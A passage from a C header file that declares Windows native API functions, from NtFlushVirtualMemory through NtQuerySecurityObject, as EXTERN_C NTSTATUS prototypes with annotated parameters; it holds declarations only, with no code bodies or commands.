NtFlushVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN OUT PULONG RegionSize,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtFlushWriteBuffer();\r\n\r\nEXTERN_C NTSTATUS NtFreeUserPhysicalPages(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PULONG NumberOfPages,\r\n\tIN PULONG UserPfnArray);\r\n\r\nEXTERN_C NTSTATUS NtFreezeRegistry(\r\n\tIN ULONG TimeOutInSeconds);\r\n\r\nEXTERN_C NTSTATUS NtFreezeTransactions(\r\n\tIN PLARGE_INTEGER FreezeTimeout,\r\n\tIN PLARGE_INTEGER ThawTimeout);\r\n\r\nEXTERN_C NTSTATUS NtGetCachedSigningLevel(\r\n\tIN HANDLE File,\r\n\tOUT PULONG Flags,\r\n\tOUT PSE_SIGNING_LEVEL SigningLevel,\r\n\tOUT PUCHAR Thumbprint OPTIONAL,\r\n\tIN OUT PULONG ThumbprintSize OPTIONAL,\r\n\tOUT PULONG ThumbprintAlgorithm OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetCompleteWnfStateSubscription(\r\n\tIN PCWNF_STATE_NAME OldDescriptorStateName OPTIONAL,\r\n\tIN PLARGE_INTEGER OldSubscriptionId OPTIONAL,\r\n\tIN ULONG OldDescriptorEventMask OPTIONAL,\r\n\tIN ULONG OldDescriptorStatus OPTIONAL,\r\n\tOUT PWNF_DELIVERY_DESCRIPTOR NewDeliveryDescriptor,\r\n\tIN ULONG DescriptorSize);\r\n\r\nEXTERN_C NTSTATUS NtGetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PCONTEXT ThreadContext);\r\n\r\nEXTERN_C NTSTATUS NtGetCurrentProcessorNumber();\r\n\r\nEXTERN_C NTSTATUS NtGetCurrentProcessorNumberEx(\r\n\tOUT PULONG ProcNumber OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetDevicePowerState(\r\n\tIN HANDLE Device,\r\n\tOUT PDEVICE_POWER_STATE State);\r\n\r\nEXTERN_C NTSTATUS NtGetMUIRegistryInfo(\r\n\tIN ULONG Flags,\r\n\tIN OUT PULONG DataSize,\r\n\tOUT PVOID SystemData);\r\n\r\nEXTERN_C NTSTATUS NtGetNextProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG HandleAttributes,\r\n\tIN ULONG Flags,\r\n\tOUT PHANDLE NewProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtGetNextThread(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG 
HandleAttributes,\r\n\tIN ULONG Flags,\r\n\tOUT PHANDLE NewThreadHandle);\r\n\r\nEXTERN_C NTSTATUS NtGetNlsSectionPtr(\r\n\tIN ULONG SectionType,\r\n\tIN ULONG SectionData,\r\n\tIN PVOID ContextData,\r\n\tOUT PVOID SectionPointer,\r\n\tOUT PULONG SectionSize);\r\n\r\nEXTERN_C NTSTATUS NtGetNotificationResourceManager(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tOUT PTRANSACTION_NOTIFICATION TransactionNotification,\r\n\tIN ULONG NotificationLength,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tOUT PULONG ReturnLength OPTIONAL,\r\n\tIN ULONG Asynchronous,\r\n\tIN ULONG AsynchronousContext OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtGetWriteWatch(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ULONG Flags,\r\n\tIN PVOID BaseAddress,\r\n\tIN ULONG RegionSize,\r\n\tOUT PULONG UserAddressArray,\r\n\tIN OUT PULONG EntriesInUserAddressArray,\r\n\tOUT PULONG Granularity);\r\n\r\nEXTERN_C NTSTATUS NtImpersonateAnonymousToken(\r\n\tIN HANDLE ThreadHandle);\r\n\r\nEXTERN_C NTSTATUS NtImpersonateThread(\r\n\tIN HANDLE ServerThreadHandle,\r\n\tIN HANDLE ClientThreadHandle,\r\n\tIN PSECURITY_QUALITY_OF_SERVICE SecurityQos);\r\n\r\nEXTERN_C NTSTATUS NtInitializeEnclave(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID EnclaveInformation,\r\n\tIN ULONG EnclaveInformationLength,\r\n\tOUT PULONG EnclaveError OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtInitializeNlsFiles(\r\n\tOUT PVOID BaseAddress,\r\n\tOUT PLCID DefaultLocaleId,\r\n\tOUT PLARGE_INTEGER DefaultCasingTableSize);\r\n\r\nEXTERN_C NTSTATUS NtInitializeRegistry(\r\n\tIN USHORT BootCondition);\r\n\r\nEXTERN_C NTSTATUS NtInitiatePowerAction(\r\n\tIN POWER_ACTION SystemAction,\r\n\tIN SYSTEM_POWER_STATE LightestSystemState,\r\n\tIN ULONG Flags,\r\n\tIN BOOLEAN Asynchronous);\r\n\r\nEXTERN_C NTSTATUS NtIsSystemResumeAutomatic();\r\n\r\nEXTERN_C NTSTATUS NtIsUILanguageComitted();\r\n\r\nEXTERN_C NTSTATUS NtListenPort(\r\n\tIN HANDLE PortHandle,\r\n\tOUT PPORT_MESSAGE ConnectionRequest);\r\n\r\nEXTERN_C NTSTATUS 
NtLoadDriver(\r\n\tIN PUNICODE_STRING DriverServiceName);\r\n\r\nEXTERN_C NTSTATUS NtLoadEnclaveData(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID Buffer,\r\n\tIN SIZE_T BufferSize,\r\n\tIN ULONG Protect,\r\n\tIN PVOID PageInformation,\r\n\tIN ULONG PageInformationLength,\r\n\tOUT PSIZE_T NumberOfBytesWritten OPTIONAL,\r\n\tOUT PULONG EnclaveError OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtLoadHotPatch(\r\n\tIN PUNICODE_STRING HotPatchName,\r\n\tIN ULONG LoadFlag);\r\n\r\nEXTERN_C NTSTATUS NtLoadKey(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN POBJECT_ATTRIBUTES SourceFile);\r\n\r\nEXTERN_C NTSTATUS NtLoadKey2(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN POBJECT_ATTRIBUTES SourceFile,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtLoadKeyEx(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN POBJECT_ATTRIBUTES SourceFile,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE TrustClassKey OPTIONAL,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess OPTIONAL,\r\n\tOUT PHANDLE RootHandle OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatus OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtLockFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PULARGE_INTEGER ByteOffset,\r\n\tIN PULARGE_INTEGER Length,\r\n\tIN ULONG Key,\r\n\tIN BOOLEAN FailImmediately,\r\n\tIN BOOLEAN ExclusiveLock);\r\n\r\nEXTERN_C NTSTATUS NtLockProductActivationKeys(\r\n\tIN OUT PULONG pPrivateVer OPTIONAL,\r\n\tOUT PULONG pSafeMode OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtLockRegistryKey(\r\n\tIN HANDLE KeyHandle);\r\n\r\nEXTERN_C NTSTATUS NtLockVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PULONG RegionSize,\r\n\tIN ULONG MapType);\r\n\r\nEXTERN_C NTSTATUS NtMakePermanentObject(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtMakeTemporaryObject(\r\n\tIN HANDLE Handle);\r\n\r\nEXTERN_C NTSTATUS NtManagePartition(\r\n\tIN 
HANDLE TargetHandle,\r\n\tIN HANDLE SourceHandle,\r\n\tIN MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,\r\n\tIN OUT PVOID PartitionInformation,\r\n\tIN ULONG PartitionInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtMapCMFModule(\r\n\tIN ULONG What,\r\n\tIN ULONG Index,\r\n\tOUT PULONG CacheIndexOut OPTIONAL,\r\n\tOUT PULONG CacheFlagsOut OPTIONAL,\r\n\tOUT PULONG ViewSizeOut OPTIONAL,\r\n\tOUT PVOID BaseAddress OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtMapUserPhysicalPages(\r\n\tIN PVOID VirtualAddress,\r\n\tIN PULONG NumberOfPages,\r\n\tIN PULONG UserPfnArray OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtMapViewOfSectionEx(\r\n\tIN HANDLE SectionHandle,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PLARGE_INTEGER SectionOffset,\r\n\tIN OUT PPVOID BaseAddress,\r\n\tIN OUT PSIZE_T ViewSize,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Protect,\r\n\tIN OUT PVOID DataBuffer OPTIONAL,\r\n\tIN ULONG DataCount);\r\n\r\nEXTERN_C NTSTATUS NtModifyBootEntry(\r\n\tIN PBOOT_ENTRY BootEntry);\r\n\r\nEXTERN_C NTSTATUS NtModifyDriverEntry(\r\n\tIN PEFI_DRIVER_ENTRY DriverEntry);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeDirectoryFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PFILE_NOTIFY_INFORMATION Buffer,\r\n\tIN ULONG Length,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeDirectoryFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree,\r\n\tIN DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine 
OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN ULONG BufferSize,\r\n\tIN BOOLEAN Asynchronous);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeMultipleKeys(\r\n\tIN HANDLE MasterKeyHandle,\r\n\tIN ULONG Count OPTIONAL,\r\n\tIN POBJECT_ATTRIBUTES SubordinateObjects OPTIONAL,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG CompletionFilter,\r\n\tIN BOOLEAN WatchTree,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN ULONG BufferSize,\r\n\tIN BOOLEAN Asynchronous);\r\n\r\nEXTERN_C NTSTATUS NtNotifyChangeSession(\r\n\tIN HANDLE SessionHandle,\r\n\tIN ULONG ChangeSequenceNumber,\r\n\tIN PLARGE_INTEGER ChangeTimeStamp,\r\n\tIN IO_SESSION_EVENT Event,\r\n\tIN IO_SESSION_STATE NewState,\r\n\tIN IO_SESSION_STATE PreviousState,\r\n\tIN PVOID Payload OPTIONAL,\r\n\tIN ULONG PayloadSize);\r\n\r\nEXTERN_C NTSTATUS NtOpenEnlistment(\r\n\tOUT PHANDLE EnlistmentHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN LPGUID EnlistmentGuid,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenEventPair(\r\n\tOUT PHANDLE EventPairHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenIoCompletion(\r\n\tOUT PHANDLE IoCompletionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenJobObject(\r\n\tOUT PHANDLE JobHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyEx(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG OpenOptions);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyTransacted(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN 
ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN HANDLE TransactionHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyTransactedEx(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG OpenOptions,\r\n\tIN HANDLE TransactionHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenKeyedEvent(\r\n\tOUT PHANDLE KeyedEventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenMutant(\r\n\tOUT PHANDLE MutantHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ACCESS_MASK GrantedAccess,\r\n\tIN PPRIVILEGE_SET Privileges OPTIONAL,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tIN BOOLEAN AccessGranted,\r\n\tOUT PBOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtOpenPartition(\r\n\tOUT PHANDLE PartitionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenPrivateNamespace(\r\n\tOUT PHANDLE NamespaceHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PVOID BoundaryDescriptor);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcessToken(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenRegistryTransaction(\r\n\tOUT PHANDLE RegistryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenResourceManager(\r\n\tOUT PHANDLE ResourceManagerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN HANDLE TmHandle,\r\n\tIN LPGUID ResourceManagerGuid 
OPTIONAL,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenSemaphore(\r\n\tOUT PHANDLE SemaphoreHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenSession(\r\n\tOUT PHANDLE SessionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenSymbolicLinkObject(\r\n\tOUT PHANDLE LinkHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenTimer(\r\n\tOUT PHANDLE TimerHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtOpenTransaction(\r\n\tOUT PHANDLE TransactionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN LPGUID Uow,\r\n\tIN HANDLE TmHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenTransactionManager(\r\n\tOUT PHANDLE TmHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PUNICODE_STRING LogFileName OPTIONAL,\r\n\tIN LPGUID TmIdentity OPTIONAL,\r\n\tIN ULONG OpenOptions OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPlugPlayControl(\r\n\tIN PLUGPLAY_CONTROL_CLASS PnPControlClass,\r\n\tIN OUT PVOID PnPControlData,\r\n\tIN ULONG PnPControlDataLength);\r\n\r\nEXTERN_C NTSTATUS NtPrePrepareComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrePrepareEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrepareComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrepareEnlistment(\r\n\tIN HANDLE 
EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtPrivilegeCheck(\r\n\tIN HANDLE ClientToken,\r\n\tIN OUT PPRIVILEGE_SET RequiredPrivileges,\r\n\tOUT PBOOLEAN Result);\r\n\r\nEXTERN_C NTSTATUS NtPrivilegeObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN PPRIVILEGE_SET Privileges,\r\n\tIN BOOLEAN AccessGranted);\r\n\r\nEXTERN_C NTSTATUS NtPrivilegedServiceAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PUNICODE_STRING ServiceName,\r\n\tIN HANDLE ClientToken,\r\n\tIN PPRIVILEGE_SET Privileges,\r\n\tIN BOOLEAN AccessGranted);\r\n\r\nEXTERN_C NTSTATUS NtPropagationComplete(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN ULONG RequestCookie,\r\n\tIN ULONG BufferLength,\r\n\tIN PVOID Buffer);\r\n\r\nEXTERN_C NTSTATUS NtPropagationFailed(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN ULONG RequestCookie,\r\n\tIN NTSTATUS PropStatus);\r\n\r\nEXTERN_C NTSTATUS NtPulseEvent(\r\n\tIN HANDLE EventHandle,\r\n\tOUT PULONG PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryAuxiliaryCounterFrequency(\r\n\tOUT PULONGLONG lpAuxiliaryCounterFrequency);\r\n\r\nEXTERN_C NTSTATUS NtQueryBootEntryOrder(\r\n\tOUT PULONG Ids OPTIONAL,\r\n\tIN OUT PULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtQueryBootOptions(\r\n\tOUT PBOOT_OPTIONS BootOptions OPTIONAL,\r\n\tIN OUT PULONG BootOptionsLength);\r\n\r\nEXTERN_C NTSTATUS NtQueryDebugFilterState(\r\n\tIN ULONG ComponentId,\r\n\tIN ULONG Level);\r\n\r\nEXTERN_C NTSTATUS NtQueryDirectoryFileEx(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass,\r\n\tIN ULONG QueryFlags,\r\n\tIN PUNICODE_STRING FileName OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS 
NtQueryDirectoryObject(\r\n\tIN HANDLE DirectoryHandle,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN ULONG Length,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN BOOLEAN RestartScan,\r\n\tIN OUT PULONG Context,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryDriverEntryOrder(\r\n\tIN PULONG Ids OPTIONAL,\r\n\tIN OUT PULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtQueryEaFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PFILE_FULL_EA_INFORMATION Buffer,\r\n\tIN ULONG Length,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PFILE_GET_EA_INFORMATION EaList OPTIONAL,\r\n\tIN ULONG EaListLength,\r\n\tIN PULONG EaIndex OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQueryFullAttributesFile(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PFILE_NETWORK_OPEN_INFORMATION FileInformation);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationAtom(\r\n\tIN USHORT Atom,\r\n\tIN ATOM_INFORMATION_CLASS AtomInformationClass,\r\n\tOUT PVOID AtomInformation,\r\n\tIN ULONG AtomInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationByName(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,\r\n\tOUT PVOID EnlistmentInformation,\r\n\tIN ULONG EnlistmentInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN JOBOBJECTINFOCLASS JobObjectInformationClass,\r\n\tOUT PVOID JobObjectInformation,\r\n\tIN ULONG JobObjectInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PORT_INFORMATION_CLASS PortInformationClass,\r\n\tOUT PVOID 
PortInformation,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationResourceManager(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,\r\n\tOUT PVOID ResourceManagerInformation,\r\n\tIN ULONG ResourceManagerInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN TRANSACTION_INFORMATION_CLASS TransactionInformationClass,\r\n\tOUT PVOID TransactionInformation,\r\n\tIN ULONG TransactionInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationTransactionManager(\r\n\tIN HANDLE TransactionManagerHandle,\r\n\tIN TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass,\r\n\tOUT PVOID TransactionManagerInformation,\r\n\tIN ULONG TransactionManagerInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationWorkerFactory(\r\n\tIN HANDLE WorkerFactoryHandle,\r\n\tIN WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,\r\n\tOUT PVOID WorkerFactoryInformation,\r\n\tIN ULONG WorkerFactoryInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInstallUILanguage(\r\n\tOUT PLANGID InstallUILanguageId);\r\n\r\nEXTERN_C NTSTATUS NtQueryIntervalProfile(\r\n\tIN KPROFILE_SOURCE ProfileSource,\r\n\tOUT PULONG Interval);\r\n\r\nEXTERN_C NTSTATUS NtQueryIoCompletion(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,\r\n\tOUT PVOID IoCompletionInformation,\r\n\tIN ULONG IoCompletionInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryLicenseValue(\r\n\tIN PUNICODE_STRING ValueName,\r\n\tOUT PULONG Type OPTIONAL,\r\n\tOUT PVOID SystemData OPTIONAL,\r\n\tIN ULONG DataSize,\r\n\tOUT PULONG ResultDataSize);\r\n\r\nEXTERN_C NTSTATUS 
NtQueryMultipleValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN OUT PKEY_VALUE_ENTRY ValueEntries,\r\n\tIN ULONG EntryCount,\r\n\tOUT PVOID ValueBuffer,\r\n\tIN PULONG BufferLength,\r\n\tOUT PULONG RequiredBufferLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryMutant(\r\n\tIN HANDLE MutantHandle,\r\n\tIN MUTANT_INFORMATION_CLASS MutantInformationClass,\r\n\tOUT PVOID MutantInformation,\r\n\tIN ULONG MutantInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryOpenSubKeys(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tOUT PULONG HandleCount);\r\n\r\nEXTERN_C NTSTATUS NtQueryOpenSubKeysEx(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN ULONG BufferLength,\r\n\tOUT PVOID Buffer,\r\n\tOUT PULONG RequiredSize);\r\n\r\nEXTERN_C NTSTATUS NtQueryPortInformationProcess();\r\n\r\nEXTERN_C NTSTATUS NtQueryQuotaInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PFILE_USER_QUOTA_INFORMATION Buffer,\r\n\tIN ULONG Length,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PFILE_QUOTA_LIST_INFORMATION SidList OPTIONAL,\r\n\tIN ULONG SidListLength,\r\n\tIN PSID StartSid OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQuerySecurityAttributesToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN PUNICODE_STRING Attributes OPTIONAL,\r\n\tIN ULONG NumberOfAttributes,\r\n\tOUT PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtQuerySecurityObject(\r\n\tIN HANDLE Handle,\r\n\tIN SECURITY_INFORMATION SecurityInformation,\r\n\tOUT PSECURITY_DESCRIPTOR SecurityDescriptor 